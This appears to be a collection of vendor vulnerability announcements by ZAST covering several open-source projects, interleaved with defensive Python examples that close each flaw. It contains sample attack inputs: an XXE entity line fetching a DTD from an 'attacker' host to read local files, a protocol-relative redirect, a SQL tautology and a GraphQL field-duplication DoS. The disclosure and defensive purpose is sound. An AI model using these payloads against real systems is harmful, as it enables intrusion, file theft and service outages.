ZAST Agent has identified 14 vulnerabilities in pybbs (tomoya92/pybbs, 2.9k+ GitHub Stars).

The attack surface includes 8 XSS vectors, CSRF on admin endpoints, and CAPTCHA reuse. Traditional SAST, which focuses on pattern matching, does not analyze logic flaws like email bypass or multi-stage flows (Stored XSS via /api/settings).

Our engine verified every attack path—from payload persistence to triggering admin-level execution—via executable PoCs. This minimizes the triage effort required for these validated findings.

Repo: https://github.com/tomoya92/pybbs

Full Technical Details: https://blog.zast.ai/cybersecurity/product%20updates/When-Your-Forum-Has-More-Holes-Than-Swiss-Cheese-A-Case-Study-in-pybbs-Security/

#AppSec #ZAST #VulnerabilityResearch #Java #XSS

ZAST Agent just verified an Open Redirect in Busy (busy-org/busy, 2.4k+ GitHub Stars).

The vulnerability targets the /callback endpoint where the state parameter is used as a redirect sink. While the code attempts to sanitize input by checking for a leading /, it fails to account for protocol-relative URLs (e.g., //attacker.com).

Our engine verified the full attack chain—generating the access_token bypass and confirming the 302 redirection via an Executable PoC. No grep-based guessing, just verified logic flaws.

Repo: https://github.com/busy-org/busy

Full Technical Details: https://github.com/busyorg/busy/issues/2287

#AppSec #ZAST #VulnerabilityResearch #Phishing #OpenRedirect
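The protocol-relative bypass described in the post, shown beside a check that closes it. This is an added example in Python, not Busy's code: the naive function reproduces the "leading /" test the post describes, and the hardened one rejects the forms a browser would resolve to another host. Function and sample values are constructed for the illustration.

```python
from urllib.parse import urlsplit

# Added example (not Busy's code): a same-site redirect check for a
# "return to" value such as the state parameter described above.

def naive_is_local_redirect(target: str) -> bool:
    """The check the post describes: anything starting with '/' is treated as local."""
    return target.startswith("/")

def is_safe_local_redirect(target: str) -> bool:
    """Accept only a path on the current origin; reject anything a browser
    could interpret as a different host."""
    if not target or not target.startswith("/"):
        return False
    # "//host" is a protocol-relative URL; browsers normalise "/\host" to the same thing.
    if target.startswith("//") or target.startswith("/\\"):
        return False
    # Tabs, newlines and backslashes are stripped or rewritten by browsers before
    # parsing, so "/\t/host" would also become "//host"; refuse them outright.
    if any(ch in target for ch in "\\\t\r\n"):
        return False
    parts = urlsplit(target)
    # A genuinely relative path parses with neither a scheme nor a network location.
    return parts.scheme == "" and parts.netloc == ""

def choose_redirect(requested: str, fallback: str = "/") -> str:
    """Return the requested target only if it passes the check, else the fallback."""
    return requested if is_safe_local_redirect(requested) else fallback

if __name__ == "__main__":
    # Constructed inputs: one legitimate return path and a few same-site lookalikes.
    for candidate in ["/dashboard", "//attacker.example/x", "/\\attacker.example",
                      "/\t/attacker.example", "https://attacker.example"]:
        print(f"{candidate!r:28} naive={naive_is_local_redirect(candidate)!s:5} "
              f"hardened={is_safe_local_redirect(candidate)}")
```

The second layer (parsing with urlsplit after the prefix checks) is there so that a future bypass in the prefix logic still has to survive the parser's view of the value; when both agree the target has no scheme and no host, the redirect stays on the current origin.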

ZAST Agent just dropped 7 CVEs (2026-1169 to 1175) on Prime CMS (birkir/prime, 1.7k+ GitHub Stars).

While traditional tools are busy pattern-matching, our autonomous engine verified 0-day DoS amplification and schema disclosure via executable PoCs. Prime's GraphQL implementation allows field duplication (5,000x __typename) and GET-based CSRF because it lacks query cost analysis and transport security.

This isn't a "potential" scan result. Our agent confirmed these by actually hitting the endpoint and verifying the resource exhaustion. No fluff, just verified 0-days.

Repo: https://github.com/birkir/prime

Full report: https://blog.zast.ai/security%20research/Security-Advisory-7-Unpatched-Vulnerabilities-in-Prime-(CMS)-GraphQL-Implementation/

#AppSec #GraphQL #CVE #ZAST #CyberSecurity
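The post says Prime lacks query cost analysis, which is what lets a single request select __typename thousands of times. Below is an added Python example, not Prime's code, of the simplest form of that control: a pre-execution pass that counts selected fields and nesting depth and rejects documents over a limit. It is a simplified tokenizer (full cost analysis also weighs resolvers and list sizes); the limits, the sample queries and the function names are constructed for the illustration.

```python
import re

# Added example (not Prime's code): a simplified selection-set limiter run
# before a GraphQL document reaches the executor.

TOKEN_RE = re.compile(
    r'"(?:\\.|[^"\\\n])*"'   # string literal (ignored)
    r'|#[^\n]*'              # comment (ignored)
    r'|\.\.\.'               # fragment spread / inline fragment marker
    r'|[A-Za-z_]\w*'         # name
    r'|[{}():@]'             # punctuation that changes how the next name is read
)

def measure_query(document: str):
    """Return (selected_fields, max_depth) for a GraphQL document."""
    tokens = TOKEN_RE.findall(document)
    depth = max_depth = fields = paren = 0
    pending = None  # next name is a spread target, type condition or directive name
    for i, tok in enumerate(tokens):
        if tok[0] in '"#':
            continue
        if tok == "(":
            paren += 1
        elif tok == ")":
            paren -= 1
        elif tok == "{":
            if paren == 0:          # braces inside arguments are object literals
                depth += 1
                max_depth = max(max_depth, depth)
        elif tok == "}":
            if paren == 0:
                depth -= 1
        elif tok == ":":
            pass
        elif tok == "...":
            pending = "spread"
        elif tok == "@":
            pending = "directive"
        elif tok == "on":
            pending = "type"
        else:  # a name
            if pending:
                pending = None
                continue
            if paren or depth == 0:
                continue  # argument/variable names and operation headers are not fields
            if i + 1 < len(tokens) and tokens[i + 1] == ":":
                continue  # alias; the real field name follows
            fields += 1
    return fields, max_depth

def check_query(document: str, max_fields: int = 200, max_depth: int = 10):
    """Gate to run before execution: (accepted, reason)."""
    fields, depth = measure_query(document)
    if fields > max_fields:
        return False, f"{fields} fields selected (limit {max_fields})"
    if depth > max_depth:
        return False, f"selection depth {depth} (limit {max_depth})"
    return True, "ok"

# Constructed sample: the duplication pattern the advisory describes.
DUPLICATED = "{ " + "__typename " * 5000 + "}"

if __name__ == "__main__":
    print(check_query("{ me { id name } }"))
    print(check_query(DUPLICATED))
```

Counting happens on the raw text, so the gate costs nothing in resolver time and rejects the oversized document before any schema work starts. The transport side of the advisory (mutations accepted over GET) is a separate control: restrict mutations to POST and require a content type that a cross-site form cannot send.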

Our AI Agent recently audited Slider Future (1,000+ active installations) and identified a critical Unauthenticated RCE, now designated as CVE-2026-1405.

While pattern-matching approaches are effective at identifying broad code signatures, this specific vulnerability resides in the logical flow of the REST API.

The endpoint /upload-image/ allows unauthenticated access because the permission_callback is set to __return_true.

Check details here: https://www.cve.org/CVERecord?id=CVE-2026-1405

@wordpress@lemmy.world @WordPress @wordfence

#AppSec #ZAST #VulnerabilityResearch #WordPress #RCE

Alert: Unauthenticated Arbitrary File Upload leading to RCE.
ZAST engine has identified a critical-severity vulnerability, CVE-2026-1405 (CVSS 9.8), in the Slider Future WordPress plugin. This flaw allows for Unrestricted Arbitrary File Upload, leading to full Remote Code Execution (RCE).

Key Technical Findings:
- Vulnerability: Unauthenticated Arbitrary File Upload to RCE
- Project Popularity: 1,000+ active installations.
- Verification: 100% verified via Autonomous PoC generation.

The vulnerability stems from a lack of authentication on the /wp-json/slider-future/v1/upload-image/ endpoint and a total absence of file type or content validation before writing to disk.

We have verified that an attacker can upload a malicious PHP script and gain control of the host server in seconds.

Check details here: https://www.cve.org/CVERecord?id=CVE-2026-1405

@wordpress@lemmy.world @WordPress @wordfence

#AppSec #ZAST #VulnerabilityResearch #WordPress #RCE
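The two posts above attribute the RCE to a permission callback that always returns true and to the absence of any file type or content check. The following is an added, framework-neutral Python illustration of the controls an upload endpoint needs, not the plugin's code and not WordPress's API: an authorization check standing in for a real permission_callback, an extension allowlist, content validation against the declared type, a scan for script markers, and a server-chosen filename. The allowlist, capability name and sample bytes are constructed for the example.

```python
import os
import secrets
from dataclasses import dataclass

# Added example (not the plugin's code): the checks an upload endpoint runs
# before anything is written to disk.

# Constructed allowlist: extension -> leading bytes the content must carry.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
MAX_UPLOAD_BYTES = 5 * 1024 * 1024
# Byte sequences that never belong in an image and mark a script or polyglot upload.
FORBIDDEN_MARKERS = (b"<?php", b"<?=", b"<script")

@dataclass(frozen=True)
class Caller:
    """Whoever hit the endpoint; None stands for an unauthenticated request."""
    name: str
    capabilities: frozenset

class UploadRejected(Exception):
    pass

def check_upload(caller, filename, data, required_capability="upload_files"):
    """Validate an upload and return the server-side name it may be stored under.
    Raises UploadRejected with the reason on the first failed control."""
    # 1. Authorization. This is the job a permission callback does; "always true" skips it.
    if caller is None or required_capability not in caller.capabilities:
        raise UploadRejected("caller is not authorised to upload")
    # 2. Size bound before any content inspection.
    if len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("file too large")
    # 3. Extension allowlist, judged on the final extension only.
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension {ext!r} not allowed")
    # 4. Content must match what the extension claims.
    if not data.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match declared type")
    # 5. No server-side code markers anywhere in the body.
    if any(marker in data for marker in FORBIDDEN_MARKERS):
        raise UploadRejected("embedded script marker found")
    # 6. Never reuse the client's name or path: pick a random one ourselves.
    return f"{secrets.token_hex(16)}.{ext}"

def upload_verdict(caller, filename, data):
    """Convenience for logging: 'accepted' or the rejection reason."""
    try:
        check_upload(caller, filename, data)
        return "accepted"
    except UploadRejected as exc:
        return str(exc)

def store_upload(directory, caller, filename, data):
    """Run the checks, then write with O_EXCL under the server-chosen name."""
    safe_name = check_upload(caller, filename, data)
    path = os.path.join(directory, safe_name)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o640)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path

# Constructed samples used by the demo.
EDITOR = Caller("editor", frozenset({"upload_files"}))
SAMPLE_PNG = ALLOWED_TYPES["png"] + bytes(16)

if __name__ == "__main__":
    print(upload_verdict(None, "logo.png", SAMPLE_PNG))
    print(upload_verdict(EDITOR, "logo.png", SAMPLE_PNG))
    print(upload_verdict(EDITOR, "shell.php", b"<?php echo 1;"))
```

The storage directory should sit outside any path the web server will execute scripts from; the random name means the client never learns or controls where the bytes landed.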

Dropped CVE-2026-1050 in Digital-Infrastructure (<= 9.6.7).

Classic SQL Injection via /server-platform/services/rest/auth/authenticate3. The tenantShortName parameter hits Y9PlatformUtil and triggers raw concatenation:
select ... where t.SHORT_NAME=' + input
ZAST verified via sqlmap-style payload. No prepared statements used.

Vulnerability details: https://github.com/risesoft-y9/Digital-Infrastructure/issues/2

#SQLi #CVE #AppSec #Infosec #ZAST
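The concatenation pattern quoted above beside its parameterised replacement, as an added Python example (not Digital-Infrastructure's Java code), run against a constructed in-memory table so the difference in behaviour is observable. Table, rows and function names are made up for the illustration.

```python
import sqlite3

# Added example (not the project's code): string concatenation versus a
# bound parameter, on a constructed tenant table.

def build_demo_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tenant (ID INTEGER PRIMARY KEY, SHORT_NAME TEXT, NAME TEXT)")
    conn.executemany(
        "INSERT INTO tenant (SHORT_NAME, NAME) VALUES (?, ?)",
        [("alpha", "Alpha Corp"), ("beta", "Beta Ltd"), ("gamma", "Gamma LLC")],
    )
    return conn

def find_tenant_concatenated(conn, short_name):
    """Vulnerable form: the caller's value is spliced straight into the SQL text,
    so a quote in the value ends the literal and the rest is parsed as SQL."""
    sql = "select t.ID, t.NAME from tenant t where t.SHORT_NAME='" + short_name + "'"
    return conn.execute(sql).fetchall()

def find_tenant_parameterized(conn, short_name):
    """Fixed form: the value travels as a bound parameter and is never parsed as SQL."""
    sql = "select t.ID, t.NAME from tenant t where t.SHORT_NAME=?"
    return conn.execute(sql, (short_name,)).fetchall()

def compare_lookups(value):
    """Row counts returned by the two forms for the same input."""
    conn = build_demo_db()
    return len(find_tenant_concatenated(conn, value)), len(find_tenant_parameterized(conn, value))

if __name__ == "__main__":
    for value in ("alpha", "x' OR '1'='1"):
        concat_rows, param_rows = compare_lookups(value)
        print(f"{value!r:18} concatenated={concat_rows} parameterized={param_rows}")
```

The textbook tautology input returns every row through the concatenated query and none through the bound one, which is exactly the distinction a prepared statement enforces: the database plans the statement first and only then receives the value.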

ZAST Security Advisory: Critical SSRF Resolved in ClawdBot.

While the community focused on general configuration risks, ZAST verified the actual code.

Our engine autonomously identified a high-severity SSRF vulnerability exploitable via DNS Rebinding. The flaw was a classic TOCTOU (Time-of-Check to Time-of-Use) gap, allowing attackers to bypass validation and access internal networks.

The Resolution: Our Co-founder @beach reported this to the maintainer @steipete, who acknowledged the issue and pushed a fix immediately.

The project has now implemented DNS Pinning to eliminate the vector. We are proud to be credited in the changelog for securing the ecosystem.

View the official fix: https://github.com/clawdbot/clawdbot/commit/b623557a2ec7e271bda003eb3ac33fbb2e218505

#AppSec #CyberSecurity #SSRF #Clawdbot #OpenSource #ZAST

Ran ZAST on ClawdBot amidst the recent hype.

Found a DNS Rebinding vector leading to full SSRF. The Logic: Classic TOCTOU. validate(url) -> OK -> fetch(url) -> Rebind -> Internal Access.

We reported to @steipete, he fixed via DNS Pinning. Acked in changelog.

Fix/Commit: https://github.com/clawdbot/clawdbot/commit/b623557a2ec7e271bda003eb3ac33fbb2e218505

Always pin your DNS results if you fetch user-supplied URLs.

#AppSec #SSRF #ClawdBot #ZAST #ZeroDay
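The two ClawdBot posts above describe the same gap: validate(url) resolves the hostname once, fetch(url) resolves it again, and a rebinding resolver changes its answer in between. The Python example below is added here and is not ClawdBot's code: it resolves once, checks every returned address against the non-public ranges, then connects to the address it checked and carries the hostname only in the Host header (and SNI for TLS). A constructed resolver that changes its answer between lookups shows the naive and pinned flows side by side offline; the hostname, addresses and function names are assumptions for the illustration.

```python
import http.client
import ipaddress
import socket
import ssl
from urllib.parse import urlsplit

# Added example (not ClawdBot's code): DNS pinning for user-supplied URLs.

class UnsafeTarget(Exception):
    pass

def is_public_address(ip: str) -> bool:
    """Reject loopback, RFC1918, link-local and other special-purpose ranges."""
    addr = ipaddress.ip_address(ip)
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)

def system_resolver(hostname: str):
    """Real DNS lookup: the distinct addresses the name currently resolves to."""
    return sorted({info[4][0] for info in socket.getaddrinfo(hostname, None)})

def pin_target(url: str, resolver=system_resolver):
    """Validate a user-supplied URL once; return (parts, ip_to_connect_to)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        raise UnsafeTarget("only http(s) URLs with a hostname are accepted")
    addresses = resolver(parts.hostname)
    if not addresses:
        raise UnsafeTarget(f"{parts.hostname} does not resolve")
    blocked = [a for a in addresses if not is_public_address(a)]
    if blocked:
        raise UnsafeTarget(f"{parts.hostname} resolves to non-public {blocked}")
    return parts, addresses[0]

def open_pinned_connection(url: str, resolver=system_resolver, timeout=10):
    """Connect to the pinned IP; the hostname is used only for Host and SNI."""
    parts, ip = pin_target(url, resolver)
    port = parts.port or (443 if parts.scheme == "https" else 80)
    sock = socket.create_connection((ip, port), timeout=timeout)
    if parts.scheme == "https":
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=parts.hostname)
        conn = http.client.HTTPSConnection(parts.hostname, port, timeout=timeout)
    else:
        conn = http.client.HTTPConnection(parts.hostname, port, timeout=timeout)
    conn.sock = sock  # socket pre-attached, so http.client never resolves the name again
    return conn

# ---- Constructed offline demonstration of the TOCTOU gap ----

class RebindingResolver:
    """Answers a public address on the first lookup and loopback afterwards,
    the way a rebinding DNS server flips its answer between queries.
    93.184.216.34 is a constructed stand-in for 'some public address'."""
    def __init__(self, first="93.184.216.34", later="127.0.0.1"):
        self.answers = [first, later]
        self.calls = 0
    def __call__(self, hostname):
        idx = min(self.calls, len(self.answers) - 1)
        self.calls += 1
        return [self.answers[idx]]

def naive_flow(url, resolver):
    """validate(url) then fetch(url): the fetch resolves a second time."""
    pin_target(url, resolver)                    # passes on the first answer
    return resolver(urlsplit(url).hostname)[0]   # the address a fresh fetch would use

def pinned_flow(url, resolver):
    """validate once, then connect to exactly the address that was validated."""
    _, ip = pin_target(url, resolver)
    return ip

if __name__ == "__main__":
    url = "http://hook.example/cb"   # constructed callback URL
    print("naive  connects to:", naive_flow(url, RebindingResolver()))
    print("pinned connects to:", pinned_flow(url, RebindingResolver()))
```

Two caveats a defender wants on record: every address in the answer set is checked, not just the first, because a resolver can hand back a mix; and a redirect response from the remote side is a new URL that must go through pin_target again before it is followed.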

We verified a Stored XSS (CVE-2026-0693) in the "Allow HTML in Category Descriptions" @WordPress plugin.

The Flaw: The plugin correctly restricts input but unintentionally removes global output filters (wp_kses_data) for all users.
The Impact: Malicious scripts in category descriptions execute for any visitor.
The Validation: Confirmed via autonomous PoC.

Security requires validating the full data lifecycle, not just lines of code.

Vulnerability details: https://www.cve.org/CVERecord?id=CVE-2026-0693
@wordfence @cve @zoomeye_team

#WordPressSecurity #AppSec #ZAST

CVE-2025-68493: Apache Struts2 XWork-Core XXE

Technical Breakdown: Our AI agent, ZAST.AI, uncovered an XXE flaw in com.opensymphony.xwork2.util.DomHelper.parse(). The root cause is a raw SAXParserFactory initialization that lacks security feature flags:
factory.setFeature("http://xml.org/sax/features/external-general-entities", false); // MISSING

Attack Vector: By manipulating the InputSource, an attacker can inject a malicious DTD.
- Payload: <!ENTITY % dtd SYSTEM "http://attacker/evil.dtd">
- Result: Full LFI (e.g., /etc/passwd, win.ini) and SSRF capabilities.

Status: Assigned CVE-2025-68493.

Affects Struts2 <= 6.0.3. Patching is critical.

🔗 Vulnerability reports: https://cwiki.apache.org/confluence/display/WW/S2-069

#XXE #CyberSecurity #ZAST #CVE #ApacheStruts2
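The missing setFeature call in the post is a Java SAX feature; the same flags exist under the same names in Python's standard-library SAX reader. The example below is added here and is not Struts' code: it builds a parser with external general and parameter entities disabled, exposes the flag values for an audit check, and parses a constructed document carrying an external entity declaration to show that the reference is dropped rather than resolved. Document, handler and function names are constructed for the illustration.

```python
import io
import xml.sax
from xml.sax.handler import ContentHandler, feature_external_ges, feature_external_pes

# Added example (not Struts' code): a SAX parser hardened with the two
# external-entity features and a check that they are really off.

# Constructed sample: an external general entity of the kind the post describes.
SAMPLE_XML = """<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<data><name>&xxe;</name><note>plain</note></data>"""

class TextCollector(ContentHandler):
    """Gathers character data so the result of parsing can be inspected."""
    def __init__(self):
        super().__init__()
        self.parts = []
    def characters(self, content):
        self.parts.append(content)

def hardened_parser():
    parser = xml.sax.make_parser()
    # The feature names are the same URIs the Java SAX API uses.
    parser.setFeature(feature_external_ges, False)   # external general entities
    parser.setFeature(feature_external_pes, False)   # external parameter entities
    return parser

def parser_flags(parser):
    """Audit helper: the two flag values a reviewer would check before use."""
    return {
        "external-general-entities": bool(parser.getFeature(feature_external_ges)),
        "external-parameter-entities": bool(parser.getFeature(feature_external_pes)),
    }

def parse_text(xml_text, parser=None):
    """Parse with the hardened reader and return the collected character data."""
    parser = parser or hardened_parser()
    handler = TextCollector()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(xml_text.encode("utf-8")))
    return "".join(handler.parts)

if __name__ == "__main__":
    print(parser_flags(hardened_parser()))
    print(repr(parse_text(SAMPLE_XML)))   # the &xxe; reference contributes nothing
```

With the flags off, the reader's external entity callback returns without fetching anything, so the content of the name element is empty and only the literal text survives; the file named in the SYSTEM identifier is never opened. Whether the parser should additionally reject any DOCTYPE outright depends on whether the application ever needs a DTD; for untrusted input that is the stricter choice.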